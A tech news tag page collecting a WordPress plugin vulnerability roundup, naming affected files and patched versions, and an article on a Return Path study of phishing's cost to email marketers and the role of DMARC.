7.4 C
Friday, November 24, 2017
Home Tags Email Marketing

Tag: Email Marketing

Most companies start their data journey the same way: with Excel. People who are deeply familiar with the business start collecting some basic data, slicing and dicing it, and trying to get a handle on what's happening. The next place they go, espe...
Earlier this week, WordPress administrators were urged to update to the popular All-in-One SEO plugin to address a persistent cross-site scripting vulnerability.

But other widely used plugins also need updating. The plugin model for WordPress is simultaneously the platform’s greatest asset and biggest vulnerability.

Administrators can happily search the rich ecosystem of plugins and find all manner of advanced features and functionality to enhance their WordPress sites. Once downloaded, these plugins are easy to install. However, the plugins are frequently poorly coded or not regularly updated, exposing WordPress sites to potential Web attacks. WordPress itself is a pretty stable platform, but WordPress sites are frequently compromised because the attackers uncover a vulnerability in one of the plugins. It turns out All-in-One wasn’t the only vulnerable plugin found by Summer of Pwnage, a Dutch community project working on uncovering vulnerabilities in popular applications.

The project posted advisories on a dozen or so other XSS vulnerabilities in widely used WordPress plugins this week. The WP Fastest Cache WordPress plugin creates static HTML files from dynamic WordPress pages.

A local file inclusion vulnerability in this plugin can be exploited to run arbitrary PHP code.

Attackers must place an arbitrary PHP file on the target system in order to exploit the vulnerability.

The issue is in /admin/partials/menu/options.php and is caused by the lack of input validation on the id POST parameter. WP Live Chat Support turns on the chat function on the WordPress site.

The persistent XSS flaw in WP Live Chat Support is similar to the one found in All-in-One SEO in that attackers can inject malicious JavaScript code into the application, which executes within the victim’s browser with the privileges of the logged-in WordPress user.

The attacker can exploit the flaw to steal a victim’s session tokens and login credentials, executing code, and logging keystrokes. The plugin uses the Referer header to present the current page on which the chat is initiated to backend users, but the URL retrieved from the data isn’t properly output encoded according to output context.
Stored XSS flaws are typically more serious because they do not need to be delivered separately to the users.

The victim -- potentially the logged-in Administrator -- only has to view wplivechat-menu page to execute the malicious code.

Administrators should update to Version 6.2.02. Another stored XSS vulnerability was found in the WordPress Activity Log plugin, which allows administrators to monitor and track site activity.

An unauthenticated attacker would be able to inject malicious JavaScript code into the application, which will then execute within the browser of any logged-in user who views the Activity Log.

The Activity Log plugin fails to sufficiently check input supplied to the X-Forward-for HTTP header and perform output encoding when an incorrect password is entered.

The malicious request gets stored in the Activity Log on the wp-admin page and executes every time someone views the page. Attackers would be able to steal victims’ session tokens and login credentials, log keystrokes, perform arbitrary actions in the context of the user, and deliver malware.

Administrators should update to Version 2.3.2. The remaining plugins on this list had a cross-site scripting vulnerability that would allow an attacker to perform a variety of actions, such as stealing Administrator session tokens and performing arbitrary actions on the website with Administrator privileges.The flaws could be exploited by tricking WordPress administrators who were logged in to open a malicious site.  All-in-One was vulnerable because the plugin failed to properly sanitize the requests, which let attackers inject malicious JavaScript code in the request headers.

The vulnerability in all the other plugins was the result of a lack of output encoding on the page request parameter. Not sanitizing inputs and outputs is a common enough mistake in coding. WordPress normally validates this parameter to shut down cross-site scripting, but didn’t in these instances because of the way the parameter value was set. The Top 10-Popular Posts plugin tracks daily and total visits for blog posts and displays the number of visits for popular and trending posts.

The issue exists in the file class-stats.php.

Anyone using the Top 10 plugin should update to Version 2.3.1. The WP No External Links plugin masks all external links across all the pages by making them internal or hiding them altogether.

The issue is in the wp-noexternallinks-options.php file.

Anyone using the WP No External Links plugin should update to Version 3.5.16. The Google forms plugin embeds a published, public Google Form into a WordPress page or widget.

The issue is in file wpgform-logging.php.

Anyone using the Google Forms plugin should update to Version 0.85. The Simple Membership WordPress plugin lets administrators set up the ability to have users sign in and out of the website and restrict access to certain pieces of content.

The flaw existed in multiple files, including class.swpm-members.php, class.swpm-membership-levels.php, admin_members_list.php, and admin_all_payment_transactions.php. WordPress administrators using Simple Membership should update to Version 3.2.9. The Profile Builder WordPress plugin provides WordPress administrators with a front-end login, user registration page, and a way to edit user profiles.

The issue is in the file class-email-confirmation.php, which found issues where an attacker put a benign page value in the URL.

Administrators should update to Version 2.4.2. MailChimp is a widely popular email marketing platform.

The Easy Forms for MailChimp WordPress plugin lets users add unlimited MailChimp signup forms to different parts of a WordPress site, including posts, pages, sidebars, and other widgetized areas.

Administrators should update to Version 6.1. Master Slider is a responsive image and content slider that gives users a smooth hardware accelerated transition.

The plugin supports touch navigation with a pure swipe gesture.

Administrators should use Master Slider Version 2.8.0. Email Users lets WordPress administrators send email to all registered users.

The issue exists in the file email_users_user_settings.php.

Administrators using the plugin should update to Version 4.8.3. Attackers like to target WordPress sites through vulnerabilities in third-party plugins. Plenty of administrators neglect to patch the CMS.

Even those diligent about staying on top of the core updates may forget to update the plugins, or opt not to because they don't want the updated plugins to break existing functionality. When plugins are no longer being actively maintained, the administrator may decide to keep using the plugin instead of looking for an alternative.

There are many reasons for still using outdated plugins, but the bottom line is that they provide attackers with a simple way to compromise and seize control of the WordPress site.
A Return Path study warns marketers of the dire consequences of fraudulent email, as consumers lose trust in a brand impacted by a phishing attack. There is an impact that phishing and fraudulent email has on organizations of all sizes, and that impact isn't just limited to security risks, but also to marketers.

Email delivery vendor Return Path has examined the cost of phishing on marketers in a report that reveals the wider impact of phishing campaigns.According to Return Path's analysis, consumers are less likely to trust a brand after it has been impacted by a phishing attack.

As such, for consumers who have been tricked by a phishing email allegedly from a brand and then received a real email from the same brand, they are less likely to open the email.

Average read rates for messages from brands where a phishing attack occurred were 18 percent less on Gmail and 11 percent on Yahoo than for brands that were not phished.While it's not all that shocking that there is a connection between phishing and consumer behavior, the study also found a few surprises."We were most surprised by the disconnect between the perception and the reality of the phishing problem among marketers," Estelle Derouet, vice president of marketing and email fraud protection at Return Path, told eWEEK. The study found that 81 percent of marketers would be concerned or very concerned if customers received a malicious email that appeared to come from their brand and yet only 32 percent of marketers say that securing the email channel is a top priority in 2016. "To us, this suggests that most marketers just don't think email fraud is happening to them," Derouet said.She added that Return Path analyzed Gmail and Yahoo inbox placement rates across 71 brands within 10 days of a phishing attack and found that one in five phishing attacks results in reduced deliverability and one in three phishing attacks results in reduced engagement."For anyone relying on email marketing to generate revenue, this can have catastrophic consequences," Derouet said.According to Derouet, the Return Path study discovered that 76 percent of marketers surveyed say they have little to no visibility into phishing attacks leveraging their brand. Among the challenges that face brand owners is also the fact that phishing attacks are not always the fault of legitimate brand owners."Even if the brand has the most secure email program in place, there's a chance they'll get phished," she said. "It is the brands who are not implementing the latest and greatest email authentication measures that put their legitimate email at risk."Derouet noted that, in contrast, email providers such as Google and Yahoo are primarily concerned with providing a great experience for their users by keeping malicious email out and legitimate email in user inboxes."These companies watch user behavior carefully to inform their delivery decisions," she said. "If a lot of users start flagging a brand's email as malicious or as spam and that brand doesn't have adequate authentication measures in place, the sender reputation will suffer and, as a result, legitimate mail is more likely to get blocked."There are a number of standards-based approaches to help organizations deliver authenticated email; among them is the DMARC (Domain Message Authentication Reporting and Conformance) protocol.

That said, Derouet commented that DMARC scares a lot of people—especially the nontechnical among us."But it is, without a doubt, the best technology out there to fight domain spoofing," she said.According to Derouet, any email, no matter how sophisticated, that spoofs a company's domain in the visible "'From address" (e.g., From: Sender sender@YourCompany.com>) will be blocked before it reaches users with DMARC.The ability to block phishing emails before they reach consumer inboxes is a big deal."As our report revealed, users are pretty terrible at identifying today's class of phishing messages," Derouet said. "Ninety-seven percent of recipients will open a malicious message, and 45 percent of users will offer up personal information during a phishing scam."The hope that Derouet has is that marketers will come to understand that not only are their customers being impacted by phishing, but that it's also up to the marketers to help fix the problem."Email fraud is a business problem, not just an IT or security problem," Derouet said. "The cost of doing nothing about phishing is not sustainable for businesses."Sean Michael Kerner is a senior editor at eWEEK and InternetNews.com.

Follow him on Twitter @TechJournalist.